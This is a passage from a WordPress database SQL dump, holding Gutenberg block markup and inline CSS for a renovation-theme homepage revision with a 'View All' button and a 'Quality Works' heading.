{\"bottomPaddingMobile\":30,\"blockId\":\"0924911c-74b7-4907-822b-208200e225a5\"} -->\n<style type=\"text/css\"> .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0924911c-74b7-4907-822b-208200e225a5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a3a7f8e1-d3ba-413d-9b6f-e963bd071379\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"89bc1d0c\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-22 20:11:42','2022-08-22 20:11:42','',336,'https://cteisys.com/?p=388',0,'revision','',0);
INSERT INTO `wp0y_posts` VALUES (389,1,'2022-08-22 20:18:15','2022-08-22 20:18:15','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f038c729-2cb3-48e6-a5f7-7ce0526e1314\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a202d1b2-2693-46ac-9aac-5131073b5669\"} -->\n<style type=\"text/css\"> .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a202d1b2-2693-46ac-9aac-5131073b5669 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e922e93a-8271-4655-97bb-328ea23766a6\"} -->\n<style type=\"text/css\"> .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e922e93a-8271-4655-97bb-328ea23766a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"a95a693b-83a8-40bc-b96a-96cca414adaf\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-a95a693b-83a8-40bc-b96a-96cca414adaf background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2e718769-fcd4-4785-9412-0cd3058119e1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2e718769-fcd4-4785-9412-0cd3058119e1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"6549beaf-ccab-45d8-a2d8-1762500e8593\"} -->\n<style type=\"text/css\"> .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6549beaf-ccab-45d8-a2d8-1762500e8593\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"46b2c521-30e6-4f12-bba8-c52b80616d9c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n 